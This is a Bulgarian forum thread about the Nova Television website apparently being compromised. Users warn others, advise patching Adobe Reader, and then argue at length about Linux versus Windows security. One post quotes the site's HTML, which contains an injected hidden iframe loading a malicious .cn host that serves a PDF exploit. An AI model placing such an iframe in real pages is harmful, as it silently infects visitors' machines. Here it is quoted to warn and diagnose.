Jump to content
BulForum.com

Не мога да отворя сайта на Нова Телевизия


Recommended Posts

  • Replies 51
  • Created
  • Last Reply

На мен ми намирисва да са го хакнали.

Ето html-кода на страницата:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Untitled Document</title> 
</head> 

<body><iframe src="http://hugetoplocate.cn:8080/index.php" width=129 height=187 style="visibility: hidden"></iframe> 
Сайтът е в процес на обновление. Моля, заповядайте по-късно.

 

А Kaspersky изрева за:

http://_hugetoplocate_cn:8080/cache/readme.pdf//data0000 Denied: HEUR:Exploit.Script.Generic

Link to comment
Share on other sites

сайта в момента опитва да зарази посетителите чрез уязвимост в Adobe Reader.

обновете си Adobe Reader, и не отваряйте сайта преди да сте го направили.

и някой да сложи предупреждение в първия пост.

Link to comment
Share on other sites

сайта в момента опитва да зарази посетителите чрез уязвимост в Adobe Reader.

обновете си Adobe Reader, и не отваряйте сайта преди да сте го направили.

и някой да сложи предупреждение в първия пост.

Не е само през Adobe Reader! Той е само една от пролуките. Има ред други, примено сериозна дупка в DirectX за потребителите на ХР/2003 и по-стари, която НЕ е пачната още от MS. Дотогава не само това, ами и си спрете възможностите на всички браузъри да плейват видео контент!

Vista/2008 не са засегнати от това последното.

Тия от Нова са уникални нещастници, все още сайта им е .... липсва. От доста време.

 

Колкото до Adobe Reader, с по-новите версии няма проблеми, но за да се защитите и от бъдещи такива глупости, поне си настройвайте браузърите да НЕ отварят директно съдържание (PDF в случая) в браузъра, а поне да се опитват само да го сейвват. Така поне можете да откажете това действие!

Ъпгрейдвайте поне до Vista.

Link to comment
Share on other sites

Това беше почти риторичен въпрос.

Това използва дупка във външен плугин за браузърите, дали Quicktime или Reader, самият факт, че дори в Убунту си има плъгини за различни неща, ако те са уязвими, да, уязвим си и ти, какво като си с Убунту.

Друг е въпросът, че отново се целят в Windows-базирани експлоити, и резултантните екзета и скриптове, работят за Windows. Ако плъгините на Адобе реадер имаха същите дупки като тия за Windows, и кода, който се изпълнява е предназначен за Линукс, познай дали нямаше да си също толкова уязвим :) .

Аз всъщност в vmware в два Windows-a (XP и 2008) пробвах няколко пъти и нищо не се случи. Дори единия път в ХР-то отвори във фрейма ПДФ, и пак нищо :) . Явно е до определени по-стари версии нещо. Преди това пробвах и с деинсталиран Reader, пак нищо. В същото време има доста заразаени хора. Явно се хващат само по-стари и дефолтни инсталации. В Reader не вреди да изключите и изпълнението на скриптове в документите, като начало.

Link to comment
Share on other sites

Ами не - нямаше да са също толкова уязвими. има фундаментални разлики в операционнте системи. Това, което можеш да причиниш на един Уиндоус,няма как да го докараш на един Линукс. Не можеш с един експлойт на Адобе плъгин или какъвто и да е плъгин да скапеш операционната система. Няма начин. Особено на Убунто, където root акаунта е забранен по дифоулт. Да прецакаш акаунт - да. Но оправянето му е въпрос на десет минути, дори без рестарт на системата.

 

Не знам как ги твърдиш тия неща... Аз работя и на двете операцонни системи и имам поглед. А ти?

Link to comment
Share on other sites

Ако потребителят работи като root, пак ли ще твърдиш, че нищо не може да му се случи?

Не, не работя усилено и на Линукс, затова просто питам.

И моля те, напиши, че Линукс никога никой не може да пробие. Дори през уеб. Или ще отречеш, че всеки софтуер е уязвим, и е само въпрос на усилия и време, и брой хора, заели се с тази задача, за да постигнат същото и с него.

 

Между другото, ако поразровиш из форуми, вече започвам да виждам мнения, че и линукс е уязвим явно на тези дупки, при това от линуксари. Нещо се оплакват. Ще чакам и ще гледам, за теб не знам. Аз поне си признавам че не съм работил много на линукс. Да видим дали ще си толкова сигурен че линукс е непробиваем. И не съм имал предвид конкретно текущата ситуация със сайта на Нова (а и както личи и доста други сайтове и в Бг са заразени). Но като гледам, точно тези събития побутват и Линукс ;)

 

ROFL @tedy :laughing:

Това си беше чист офтопик. Поне да се беше аргументирал защо ли....?! :bgrin:

Link to comment
Share on other sites

1. Няма нормален потребител на Линукс, който да използва системата си като root.

 

2. Човека попита дали е уязвим под Убунто, ти му каза - разбира се че си... поправи ме ако греша, но точно това му обясни - щом отваря pdf значи е уязвим, нищо че е на убунто... Явно не си запознат, че при Убунто именно root акаунта е ЗАБРАНЕН, недостъпен по подразбиране още по време на инсталацията.

 

3. Не съм казал, че Линукс никой не може да пробие... моля да бъдем точни. Казах: Ами не, не е също толкова уязвим под Лнукс - в отговор на твоето твърдение, че щом отваря pdf файлове в баузъра си, значи е също толково уязвим, колкото и Уиндоус. И това е факт, подисвам се под него - Линукс никога не може да е също толкова уязвим колкото Уиндоус. Поради простчкия факт, че един вирус скапва самата ОС, когато говорим за Уиндоус - което е не възможно при Линукс. Единствено можеш да пробиеш акаунт на потребител. И щетите, които ще причиниш, ще бъдат отстранени за 15 минути, без дори да се налага рестартиране - нещо което ти никога не можеш да кажеш за Уиндоус. Там освен, че ще рестартираш, ще стартираш риковъри конзоли, ще влизаш в сейф мод.... накрая може да ти се наложи да прибегнеш до услугите на... лайф сиди под Линукс... и в крайна сметка - ще преинсталираш. В темата за вирусите ти самият каза, че най-ефикасния метод да обезпаразитяване Ундоус е да възстановиш от бекъп чиста инсталация.

 

Та така. Не казвам, че не е уязвим. Казвам, че е стотци пъти по-малко уязвим в сравнение с Уиндоус.

 

Твърдението ти - Уиндоус е уязвим, ама Линукс е СЪЩО ТОЛКОВА уязвим - е абсолютно заблуждаващо, да не кажа по-сериозна дума. Не прави такива неотговарящи на истината твърдения.

Link to comment
Share on other sites

Извини ме, което ще кажа, но мислех, че ще схванеш почти ироничния ми коментар към въпроса дали Убунту е уязвимо. Не съм толкова глупав да мисля, че само защото му се показва ПДФ в браузъра, да правя някакви по-конкретни заключения. Аз и в следващия си пост загатнах за това. Нещата винаги изискват по-разширена дискусия за въпрос относно зададения. Просто въпросът беше такъв.

 

Целите ти два поста бяха базирани на това мое иронично изказване, затова и не смятам, че има нужда от по-нататъшен коментар.

Невинаги става ясно кой кога пише иронично/саркастично/шеговито, но кой разбрал, разбрал ;) Съжалявам, че си се хабил да пишеш и да се пениш напразно :) . Едно "Приемам поста ти за майтап" щеше да има същия, ако не и по-добър ефект.

Link to comment
Share on other sites

Ако плъгините на Адобе реадер имаха същите дупки като тия за Windows, и кода, който се изпълнява е предназначен за Линукс, познай дали нямаше да си също толкова уязвим

Ами сигурно изглупявам, но в горното не виждам ироничен коментар, а твърдение, което казва че Линукс е също толкова уязвим колкото и Уиндоус и при това го твърди със серизността на истинска истина... В първото си изечение заявяваш, че въпроса ти бил риторичен, което трябва да значи, че отговора е от ясен по-ясен и по-надолу разбираме, че той е именно този - ако имаш плъгини, уязвим си също толкова колкото и с Уиндоус, какво като си с Убунту...

 

Все си мисля, че имам добро чувство за хумор и тънка ирония... нещо не ги намирам в поста ти.

 

Иначе съм съгласен, че цялото ти твърдение е в квадрата на майтапа - вече на два пъти казах защо.

 

П.П Интересно ако не се бях обадил и тая малка дискусия не се беше състояла, дали поста ти щеше да е ироничен, или в последствие след включването ми придоби иронична насоченост... няма как да разберем.

 

За мен е важно хората да не остават с погрешни впечатления в резултат на такива и подобни "иронични" твърдения, които на мен ми звучат като плоски оправдания - да бе уиндоус секюрити съкс, ама и линукс също толкова съкс. Ако ще и това да ме прави тъп.

 

забрави дежурното обяснения - уиндоус секюрити си е ок, виновни са неграмотно написаните плъгини и програми и драйвъри на трети фирми... Което също е иронично и в квадрата на матапа, защото Линукс секюритито си е ОК и системата е стабилна ВЪПРЕКИ кода на третите и четвъртите фирми...

Link to comment
Share on other sites

забрави дежурното обяснения - уиндоус секюрити си е ок, виновни са неграмотно написаните плъгини и програми и драйвъри на трети фирми... Което също е иронично и в квадрата на матапа, защото Линукс секюритито си е ОК и системата е стабилна ВЪПРЕКИ кода на третите и четвъртите фирми...

 

Zabravi da dobavish i debilnite potrebiteli, koito cukat nasam-natam, bez da znaqt kakvo pravqt... kak ne gi e sram :laughing:

Link to comment
Share on other sites

Първо му казвам ROFL, т.е "поста ти е майтап" без въобще да се обяснявам, а и не виждам смисъл при положение, че overman ти го обясни.

 

После пък, йок "Това си беше чист офтопик. Поне да се беше аргументирал защо ли....?! "

 

След като се аргументираха (вместо мен (отново) ) пък минахме на "Приемам поста ти за майтап" щеше да има същия, ако не и по-добър ефект.

 

На това му се казва фурнаджийска лопата.

Link to comment
Share on other sites

Мисля, че се заформи излишен спор, който не доказва абсолютно нищо на никого, ти се опитваш да докажеш, че аз греша в буквата на изказването си, а моята мисъл беше, че хората с линукс имат измамно чувство за сигурност, до голяма степен, принципно. Затова и ми направи впечатление въпроса и запитването дали Убунту е уязвим. Е, уязвим е вероятно на точно тези атаки. И едва ли някой ще остане заблуден от някакво мое изказване, приеми, че не можеш да огрееш навсякъде, където аз пиша, и дори тук да възцаряваш истината и отваряш очите на заблудените, има други места, където не си присъствен :lol: .

Емотиконата в първото ми мнение, която дублира точно иконата на цитирания от мен въпрос, мисля в комбинация с конректия ѝ вид, говори достатъчно, в комбинация с отговора ми.

Следващото, което написах не може да се охарактеризира точно, защото на каква точно вирусна база определяш, че не е"същото", което може да се причини на един линукс, опериращ с root права, спрямо един Windows 2008 примерно (вероятно имаш повече досег с ХР-та разни, където нещата са по-зле). Под "същото" имах предвид че може да се причинят подобни главоболия за един домашен потребител. Дори аз знам, че секюритито на линукс по замисъл е по-усъвършенствано традиционно, но и в двата "лагера" може да се случат еднакво катастрофални неща, като последните няколко версии на MS продукта доказва, че се подобрява. Интересно защо напоследък до ушите ми стигат много повече примери и факти за хакнати линукс сървъри и сайтове, отколкото Windows takiwa (което не съм чувал скоро, дали слушам избирателно?! :) ), независимо дали е влезнато през бъгави telnet, FTP server, и т.н., в случая не става дума дали се стига до преинсталация, а че като влезе някой, може да направи каквото иска, ако е с роот права, да изтрие всичко, после кел файда дали си с линукс или с Windows, в случая с Windows най-лошото което може да стане е да ти се наложи да възстановиш имидж за 10 мин. и да възстановиш данни от backup.

ov3rm4n, навлизаме в излишен спор, и ако се замислиш, дори ти ще го проумееш.

 

slick, беше написал просто едно ROFL, и на мен ми се иска в 99% от темите да изсе*а по една усмивка в знак на съгласие, или всякакви душевни ла*на които ми идват на момента като чета нечие мнение в темите, но не го правя, или ако го правя, пиша защо и какво имам предвид. Но рядко го правя, въздържам се.

Добре че поне се изясни, макар и впоследствие.

Фурнаджийска лопата за кое? Пишеш откровени глупости без да си схванал смисъла на написаното, явно не можеш да четеш или да мислиш, всеки може да реши за себе си кое от двете ;)

 

С две думи, HEMO, засега намирам мнения, че и с Линукс хората са имали проблеми след въпросния сайт. Аз с Win2008 не съм имал никакви. Така че бъди нащрек.

Link to comment
Share on other sites

Мисля, че се заформи излишен спор...

 

Напротив,в спора понякога се ражда истината...Въпреки,че споделям изцяло мнението на Овърман ми беше интересно да прочета и твоето :) Не ме разбирай погрешно,нямам изобщо никакво намерение да се заяждам или да превръщам темата в спор лин vs вин...

Link to comment
Share on other sites

Напротив,в спора понякога се ражда истината...Въпреки,че споделям изцяло мнението на Овърман ми беше интересно да прочета и твоето :) Не ме разбирай погрешно,нямам изобщо никакво намерение да се заяждам или да превръщам темата в спор лин vs вин...

Знам :) . Аз също, съжалявам ако е прозвучало по друг начин, просто понякога всяка нотка от сорта на линукс тва линукс онва, събужда нещо в мен..

Иначе всеки има право на мнение, но докато не се изкаже някой, който директно е участвал в писането на кода на дадена OS или има поглед НАД НЕГО, аз лично ще считам неговото мнение за заблуждаващо, по повод, че видите ли еди кое си било много по-сигурно на теория или практика от другото, и точка.

Както споделих с един познат наскоро, концепцията на нещо си, е много хубаво, мен ме плаши реализацията, а няма перфектна реализация, и до еднакви катастрофални резултати (за бизнеса или за домакинството или за каквото и да е) може да се доведе всяка OS, в зависимост какъв я е конфигурирал, поддържа и дали бекъпва и т.н.

Link to comment
Share on other sites

просто понякога всяка нотка от сорта на линукс тва линукс онва, събужда нещо в мен..

На мен голяма част от мненията ти ми действат по подобен начин ;). По - специално в един раздел от форума.

 

Edit:

Също така и в Линукс раздела. Значи стават два.

Link to comment
Share on other sites

На мен голяма част от мненията ти ми действат по подобен начин ;). По - специално в един раздел от форума.

:lol: :lol: :lol:

Радвам се, че намираме допирни точки, с които да си доставяме взаимно удоволствие :bgrin:

 

В Windows (опа, Software) раздела, нали.. :rolleyes:

Link to comment
Share on other sites

Знам :) . Аз също, съжалявам ако е прозвучало по друг начин, просто понякога всяка нотка от сорта на линукс тва линукс онва, събужда нещо в мен..

Иначе всеки има право на мнение, но докато не се изкаже някой, който директно е участвал в писането на кода на дадена OS или има поглед НАД НЕГО, аз лично ще считам неговото мнение за заблуждаващо, по повод, че видите ли еди кое си било много по-сигурно на теория или практика от другото, и точка.

Както споделих с един познат наскоро, концепцията на нещо си, е много хубаво, мен ме плаши реализацията, а няма перфектна реализация, и до еднакви катастрофални резултати (за бизнеса или за домакинството или за каквото и да е) може да се доведе всяка OS, в зависимост какъв я е конфигурирал, поддържа и дали бекъпва и т.н.

Теди, извинявай, че ще ти го кажа директно, но не се ли усещащ какви глупости написа в тази тема. Имаш претенциите да си опитен програмист, но някак си не мога по никакъв начин да схвана например "логиката" как ескплоатирането на едно буферно препълване за Уиндоус с шел код (или изпълнение на какъвто и да е код) ще работи под Линукс. Би ли обяснил според теб точно и подробно как става номера? Освен това по никакъв начин не мога да резбера тезата ти единствено да вярваш на този, който е писал кода на дадената ОС? Ами нали точно същия шемет е допуснал съществуването на въпросните уязвимости без да ги осъзнае, които биват откривани и експлоатирани от съвсем различни други образи. Още по-интересно е как решаваш, че Уин 2008 е супер, щото разбираш ли ти не си имал проблеми с него? Я вземете се стегнете малко и мислете с главите си, щото ако за средни тийнейджъри подобни приказки са в рамките на нормалното, не мога да допусна, че опитен девелопър с претенции като теб е в състояние да сътвори подобни фантазии.

То не случайно всеки код бълван наляво и надясно е пълен с какви ли не уязвимости, защото повечето ти колеги са именно с подобно мислене, което все пак е много добре лично за мен, защото по този начин ми осигуряват гарантирана работа за десетилетия напред. :laughing:

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.


×
×
  • Create New...